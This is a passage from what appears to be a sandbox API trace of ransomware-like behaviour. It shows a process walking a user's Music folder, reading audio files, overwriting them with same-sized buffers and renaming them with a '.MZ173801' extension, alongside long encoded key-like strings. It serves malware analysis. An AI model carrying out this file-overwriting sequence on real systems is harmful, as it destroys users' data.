lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.909] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0116.909] GetCurrentThreadId () returned 0x1358 [0116.909] GetCurrentThreadId () returned 0x1358 [0116.909] GetCurrentThreadId () returned 0x1358 [0116.910] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\5xR3\\WZY4fY8_E--mGLKS21.mp3" (normalized: "c:\\users\\fd1hvy\\music\\5xr3\\wzy4fy8_e--mglks21.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.910] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0116.910] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0116.910] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x17946 [0116.910] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0116.910] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x17946, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x17946, lpOverlapped=0x0) returned 1 [0116.912] CloseHandle (hObject=0x3d0) returned 1 [0116.914] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\5xR3\\WZY4fY8_E--mGLKS21.mp3" (normalized: "c:\\users\\fd1hvy\\music\\5xr3\\wzy4fy8_e--mglks21.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.915] WriteFile (in: hFile=0x3d0, lpBuffer=0x23c2ad0*, nNumberOfBytesToWrite=0x17946, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x23c2ad0*, lpNumberOfBytesWritten=0x19f6f0*=0x17946, lpOverlapped=0x0) returned 1 [0116.917] CloseHandle (hObject=0x3d0) returned 1 [0116.920] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\5xR3\\WZY4fY8_E--mGLKS21.mp3" (normalized: "c:\\users\\fd1hvy\\music\\5xr3\\wzy4fy8_e--mglks21.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\5xR3\\WZY4fY8_E--mGLKS21.mp3.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\5xr3\\wzy4fy8_e--mglks21.mp3.mz173801")) returned 1 [0116.921] GetCurrentThreadId () returned 0x1358 [0116.921] GetCurrentThreadId () returned 0x1358 [0116.921] GetCurrentThreadId () returned 0x1358 [0116.921] GetCurrentThreadId () returned 0x1358 [0116.921] GetCurrentThreadId () returned 0x1358 [0116.921] GetCurrentThreadId () returned 0x1358 [0116.921] FindNextFileW (in: hFindFile=0xa1bb60, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab0c740, ftCreationTime.dwHighDateTime=0x1d5e738, ftLastAccessTime.dwLowDateTime=0x4f132200, ftLastAccessTime.dwHighDateTime=0x1d5f00e, ftLastWriteTime.dwLowDateTime=0x4f132200, ftLastWriteTime.dwHighDateTime=0x1d5f00e, nFileSizeHigh=0x0, nFileSizeLow=0x17946, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="WZY4fY8_E--mGLKS21.mp3", cAlternateFileName="WZY4FY~1.MP3")) returned 0 [0116.921] GetLastError () returned 0x12 [0116.921] FindClose (in: hFindFile=0xa1bb60 | out: hFindFile=0xa1bb60) returned 1 [0116.921] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\5xR3\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a017930, ftCreationTime.dwHighDateTime=0x1d5e3f6, ftLastAccessTime.dwLowDateTime=0xa6f66c85, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa6f66c85, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1be00 [0116.921] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0116.921] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.921] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a017930, ftCreationTime.dwHighDateTime=0x1d5e3f6, ftLastAccessTime.dwLowDateTime=0xa6f66c85, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa6f66c85, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0116.921] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.921] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.921] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1bb5190, ftCreationTime.dwHighDateTime=0x1d5e37e, ftLastAccessTime.dwLowDateTime=0xc51fbb40, ftLastAccessTime.dwHighDateTime=0x1d5e84b, ftLastWriteTime.dwLowDateTime=0xa6d046d0, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x9e83, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="Q2PT-p_KEzetPwQd hO2.wav.MZ173801", cAlternateFileName="Q2PT-P~1.MZ1")) returned 1 [0116.921] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.922] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.922] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5502a30, ftCreationTime.dwHighDateTime=0x1d5ed66, ftLastAccessTime.dwLowDateTime=0x358726f0, ftLastAccessTime.dwHighDateTime=0x1d5eace, ftLastWriteTime.dwLowDateTime=0xa6d046d0, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x9071, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="wk25qq4bwLfkVhGZ.m4a.MZ173801", cAlternateFileName="WK25QQ~1.MZ1")) returned 1 [0116.922] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.922] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.922] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab0c740, ftCreationTime.dwHighDateTime=0x1d5e738, ftLastAccessTime.dwLowDateTime=0x4f132200, ftLastAccessTime.dwHighDateTime=0x1d5f00e, ftLastWriteTime.dwLowDateTime=0xa6f66c85, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x17946, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="WZY4fY8_E--mGLKS21.mp3.MZ173801", cAlternateFileName="WZY4FY~1.MZ1")) returned 1 [0116.922] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.922] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.922] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab0c740, ftCreationTime.dwHighDateTime=0x1d5e738, ftLastAccessTime.dwLowDateTime=0x4f132200, ftLastAccessTime.dwHighDateTime=0x1d5f00e, ftLastWriteTime.dwLowDateTime=0xa6f66c85, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x17946, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="WZY4fY8_E--mGLKS21.mp3.MZ173801", cAlternateFileName="WZY4FY~1.MZ1")) returned 0 [0116.922] GetLastError () returned 0x12 [0116.922] FindClose (in: hFindFile=0xa1be00 | out: hFindFile=0xa1be00) returned 1 [0116.922] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61fecef0, ftCreationTime.dwHighDateTime=0x1d5ef32, ftLastAccessTime.dwLowDateTime=0xf9265b60, ftLastAccessTime.dwHighDateTime=0x1d5eaad, ftLastWriteTime.dwLowDateTime=0xa6a09766, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x60f8, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="6o05.mp3.MZ173801", cAlternateFileName="6O05MP~1.MZ1")) returned 1 [0116.922] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0116.922] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0116.922] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4409f518, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4409f518, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0116.922] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c075df0, ftCreationTime.dwHighDateTime=0x1d5ea90, ftLastAccessTime.dwLowDateTime=0xb8540070, ftLastAccessTime.dwHighDateTime=0x1d5eb33, ftLastWriteTime.dwLowDateTime=0xa6ce1567, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x15d22, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="EtLEEKM-JP9vt.mp3.MZ173801", cAlternateFileName="ETLEEK~1.MZ1")) returned 1 [0116.922] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0116.922] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0116.922] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf06fcd0, ftCreationTime.dwHighDateTime=0x1d5e3ee, ftLastAccessTime.dwLowDateTime=0x8032efa0, ftLastAccessTime.dwHighDateTime=0x1d5e4ab, ftLastWriteTime.dwLowDateTime=0xa6ce1567, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3988, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="hhHYj9Pnudi.mp3.MZ173801", cAlternateFileName="HHHYJ9~1.MZ1")) returned 1 [0116.922] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0116.922] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0116.922] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c22ad20, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe24d7270, ftLastAccessTime.dwHighDateTime=0x1d5e98b, ftLastWriteTime.dwLowDateTime=0xe24d7270, ftLastWriteTime.dwHighDateTime=0x1d5e98b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="stszJlZAZD-p", cAlternateFileName="STSZJL~1")) returned 1 [0116.922] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0116.922] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0116.922] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c22ad20, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe24d7270, ftLastAccessTime.dwHighDateTime=0x1d5e98b, ftLastWriteTime.dwLowDateTime=0xe24d7270, ftLastWriteTime.dwHighDateTime=0x1d5e98b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1be00 [0116.922] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c22ad20, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe24d7270, ftLastAccessTime.dwHighDateTime=0x1d5e98b, ftLastWriteTime.dwLowDateTime=0xe24d7270, ftLastWriteTime.dwHighDateTime=0x1d5e98b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0116.922] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31740de0, ftCreationTime.dwHighDateTime=0x1d5ed7a, ftLastAccessTime.dwLowDateTime=0x69838da0, ftLastAccessTime.dwHighDateTime=0x1d5e40b, ftLastWriteTime.dwLowDateTime=0x69838da0, ftLastWriteTime.dwHighDateTime=0x1d5e40b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="1Zion8xjlGTdeA8sDujv", cAlternateFileName="1ZION8~1")) returned 1 [0116.922] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb4635c0, ftCreationTime.dwHighDateTime=0x1d5ea0b, ftLastAccessTime.dwLowDateTime=0x6a584e40, ftLastAccessTime.dwHighDateTime=0x1d5f0fa, ftLastWriteTime.dwLowDateTime=0x6a584e40, ftLastWriteTime.dwHighDateTime=0x1d5f0fa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="3MH4hI_B2Y4fI4Q-s4O", cAlternateFileName="3MH4HI~1")) returned 1 [0116.922] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd45a9b70, ftCreationTime.dwHighDateTime=0x1d5eb70, ftLastAccessTime.dwLowDateTime=0xf4ae9e40, ftLastAccessTime.dwHighDateTime=0x1d5ecc3, ftLastWriteTime.dwLowDateTime=0xf4ae9e40, ftLastWriteTime.dwHighDateTime=0x1d5ecc3, nFileSizeHigh=0x0, nFileSizeLow=0x147ed, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="CovaDgRA8.m4a", cAlternateFileName="COVADG~1.M4A")) returned 1 [0116.923] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0116.923] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.923] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\CovaDgRA8.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\covadgra8.m4a"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd45a9b70, ftCreationTime.dwHighDateTime=0x1d5eb70, ftLastAccessTime.dwLowDateTime=0xf4ae9e40, ftLastAccessTime.dwHighDateTime=0x1d5ecc3, ftLastWriteTime.dwLowDateTime=0xf4ae9e40, ftLastWriteTime.dwHighDateTime=0x1d5ecc3, nFileSizeHigh=0x0, nFileSizeLow=0x147ed)) returned 1 [0116.923] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.923] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNE